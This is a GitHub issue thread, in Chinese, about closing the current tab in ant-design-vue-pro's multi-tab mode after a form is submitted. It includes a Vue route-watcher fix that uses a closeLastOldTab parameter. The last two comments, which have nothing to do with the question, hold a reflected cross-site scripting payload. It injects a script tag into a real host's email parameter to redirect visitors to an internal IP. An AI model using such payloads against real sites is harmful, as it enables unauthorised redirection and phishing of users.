### ISSUE TITLE
请教下，在多标签页模式下，在表单提交后，如果使用代码关闭当前标签页

### ISSUE THREAD

**Issue by guoping007** [vueComponent/ant-design-vue-pro#383]
**Question （问题描述）**
请教下，在多标签页模式下，在表单提交后，如果使用代码关闭当前标签页

**Describe the solution you'd like （你期待的是什么？）**

**Additional context（附加信息）**

**Comment by sendya** [comment]
无法支持

**Comment by free-pan** [comment]
@guoping007 

`multitab`是通过监听路由变化来增加标签页的, 那么同样的, 你也可以在进行路由跳转时, 增加特定参数如:`closeOld=true`这种, 然后在`multitab`的路由监听函数中, 增加相应的逻辑.如发现路由参数中存在`closeOld=true`这种参数和值, 就删除`fullPathList`和`pages`中对应的值. 达到关闭标签页的目的.

具体修改方式:

`MultiTab.vue`代码修改:

```
...其它代码

watch: {
    '$route': function (newVal, oldVal) {
      if (oldVal && oldVal.path && newVal.params.closeLastOldTab) {
        this.remove(oldVal.path)
      }
      this.activeKey = newVal.fullPath
      if (this.fullPathList.indexOf(newVal.fullPath) < 0) {
        this.fullPathList.push(newVal.fullPath)
        this.pages.push(newVal)
      }
    },

...其它代码
```

进行路由跳转时加入参数:`closeLastOldTab`

```
this.$router.push({ name: 'list-route-ui', params: { closeLastOldTab: true } })
```

**Comment by sendya** [comment]
最新提交里，增加了一些功能，但是并不完善，你可以尝试自己优化功能。
本项目不保证 该功能 在后期是否会继续维护

https://github.com/sendya/ant-design-pro-vue/tree/master/src/components/MultiTab

![image](https://user-images.githubusercontent.com/5404542/64483489-ee521580-d234-11e9-8ba3-6cb70b5e386a.png)

**Comment by itmeryn** [comment]
http://114.113.157.155:8080/metis/?email=</script><script language="JavaScript" type="text/javascript"> window.location.href="http://172.27.7.6";</script>

**Comment by itmeryn** [comment]
<a href="http://114.113.157.155:8080/metis/?email=</script><script language="JavaScript" type="text/javascript"> window.location.href="http://172.27.7.6";</script>"> sadadad </a>
